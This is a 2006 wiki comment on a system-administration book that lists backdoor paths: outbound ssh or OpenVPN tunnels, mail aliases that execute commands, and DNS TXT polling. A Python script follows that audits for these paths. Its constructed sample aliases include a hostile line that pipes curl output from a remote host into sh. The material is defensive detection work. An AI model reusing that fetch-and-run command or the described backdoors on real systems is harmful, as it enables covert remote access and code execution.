NO MORE UPDATES TO THIS PAGE PLEASE. SUBMIT ALL FUTURE COMMENTS TO
You mention backdoors in 31.2.2, but really this is a much more major problem. You say in 31.1.3 and 31.1.4 (pg 677) that the three tiers provide redundancy, but it's not true. If you remove physical access, remote access and service access, you may still be open to abuse.
e.g. a machine under a desk (or in a data center) that makes outgoing ssh connections via the web proxy to a remote machine and port-forwards back from that machine to port 22, or even makes an OpenVPN connection. The person now has remote access to your network. This backdoor could even run on a production server with an innocuous process name.
e.g. a .forward file or an entry in mail aliases programmed to execute commands when a specially formatted email
e.g. a process that monitors a TXT RR of some DNS entry somewhere and executes commands found in it.
These possibilities scare me and I'd love it if you had a good way of solving these problems!
--
StephenHarris - 31 Aug 2006
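Added example, not part of the comment above or of the book: one way to hunt for the three paths Stephen lists (mail aliases that pipe into programs, outbound ssh/OpenVPN tunnels through the proxy, and a host polling a DNS TXT record for orders) from data a sysadmin already has. The aliases/.forward text, the `ss -tnp` output, the BIND-style query log, the proxy port 3128, and the allowlists are all constructed assumptions for this example.

```python
"""Audit helpers for three 'forgotten' remote-access paths: command-executing
mail aliases, outbound tunnels, and DNS TXT polling. All sample inputs below
are constructed for this example, not captured from a real system."""
import re
from collections import Counter

# Constructed /etc/aliases content with a user's ~/.forward appended.
SAMPLE_ALIASES = """\
postmaster: root
helpdesk: "|/usr/local/bin/ticket-intake"
ops: ops@example.com, \\ops
# ~/.forward of user bob (constructed)
\\bob, "|/usr/bin/procmail"
releases: "|/bin/sh -c 'curl -s http://203.0.113.9/x | sh'"
"""
# Programs we expect mail to be piped into (assumption for the example).
ALIAS_ALLOWLIST = {"/usr/bin/procmail", "/usr/local/bin/ticket-intake"}
ALIAS_RE = re.compile(r'^([^\s:]+):\s*(.*)$')          # "name: targets"
PIPE_RE = re.compile(r'"\|(.*?)"|\|([^,\s]+)')          # "|cmd args" or |cmd

# Constructed `ss -tnp` output: state, queues, local, peer, owning process.
SAMPLE_SS = """\
State  Recv-Q Send-Q Local Address:Port  Peer Address:Port   Process
ESTAB  0      0      10.0.0.5:44310      10.0.0.2:3128       users:(("firefox",pid=2231,fd=55))
ESTAB  0      0      10.0.0.5:51002      10.0.0.2:3128       users:(("kworker",pid=3190,fd=3))
ESTAB  0      0      10.0.0.5:22         10.0.0.9:60122      users:(("sshd",pid=812,fd=4))
ESTAB  0      0      10.0.0.5:38811      203.0.113.5:1194    users:(("update-helper",pid=5311,fd=6))
"""
PROXY_PORT = 3128                               # the site web proxy (assumption)
TUNNEL_PORTS = {22, 1194}                       # ssh, OpenVPN
PROXY_CLIENTS = {"firefox", "curl", "apt-get"}  # expected proxy users (assumption)
SS_RE = re.compile(r'^(\S+)\s+\d+\s+\d+\s+(\S+):(\d+)\s+(\S+):(\d+)\s+'
                   r'users:\(\("([^"]+)",pid=(\d+)')

# Constructed BIND-style query log: one client keeps asking for the same TXT RR.
SAMPLE_DNS_LOG = """\
client 10.0.0.5#51234: query: cfg.ops.example.net IN TXT + (10.0.0.1)
client 10.0.0.7#40011: query: www.example.com IN A + (10.0.0.1)
client 10.0.0.5#51290: query: cfg.ops.example.net IN TXT + (10.0.0.1)
client 10.0.0.9#33120: query: mail.example.com IN MX + (10.0.0.1)
client 10.0.0.5#51301: query: cfg.ops.example.net IN TXT + (10.0.0.1)
client 10.0.0.7#40020: query: _dmarc.example.org IN TXT + (10.0.0.1)
"""
DNS_RE = re.compile(r'client (?:@\S+ )?(\d+\.\d+\.\d+\.\d+)#\d+(?: \([^)]*\))?'
                    r': query: (\S+) IN (\S+)')


def find_pipe_aliases(text, allowlist=ALIAS_ALLOWLIST):
    """Return (recipient, command) for every alias or .forward entry that pipes
    mail into a program not on the allowlist. Each pipe entry is code that any
    mail sender can trigger, so an unknown one is a backdoor candidate."""
    hits = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        m = ALIAS_RE.match(line)
        name, targets = (m.group(1), m.group(2)) if m else (".forward", line)
        for quoted, bare in PIPE_RE.findall(targets):
            cmd = quoted or bare
            if cmd.split()[0] not in allowlist:
                hits.append((name, cmd))
    return hits


def find_tunnel_connections(ss_text, proxy_port=PROXY_PORT, proxy_clients=PROXY_CLIENTS):
    """Flag established outbound sockets that look like a tunnel: anything
    straight to an ssh/OpenVPN port, and any proxy use by a process that is not
    a known proxy client. Keying on the socket, not argv, survives a renamed
    binary with an innocuous process name."""
    hits = []
    for line in ss_text.splitlines():
        m = SS_RE.match(line)
        if not m or m.group(1) != "ESTAB":
            continue
        _state, _local, lport, peer, pport, proc, pid = m.groups()
        lport, pport = int(lport), int(pport)
        if lport in TUNNEL_PORTS:          # inbound to our own sshd/vpn, not outbound
            continue
        if pport in TUNNEL_PORTS:
            hits.append((int(pid), proc, f"direct tunnel to {peer}:{pport}"))
        elif pport == proxy_port and proc not in proxy_clients:
            hits.append((int(pid), proc, f"unexpected proxy client via {peer}:{pport}"))
    return hits


def find_txt_pollers(log_text, min_queries=3):
    """Return {(client, qname): count} for TXT names one client asks for at
    least min_queries times. A process taking orders from a TXT RR must keep
    re-querying it; ordinary TXT lookups (SPF, DMARC) are rare per client."""
    counts = Counter()
    for line in log_text.splitlines():
        m = DNS_RE.search(line)
        if m and m.group(3) == "TXT":
            counts[(m.group(1), m.group(2))] += 1
    return {key: n for key, n in counts.items() if n >= min_queries}


if __name__ == "__main__":
    for hit in find_pipe_aliases(SAMPLE_ALIASES):
        print("mail alias executes a program:", hit)
    for hit in find_tunnel_connections(SAMPLE_SS):
        print("possible outbound tunnel:", hit)
    for key, n in find_txt_pollers(SAMPLE_DNS_LOG).items():
        print("repeated TXT polling:", key, n)
```

Two caveats when running this against real data: the TXT check only works on the query log of the recursive resolver the host actually uses (a caching resolver answers repeat lookups within the TTL without the authoritative server ever seeing them), and the socket check catches the tunnel only while it is up, so it belongs in a periodic job rather than a one-off audit.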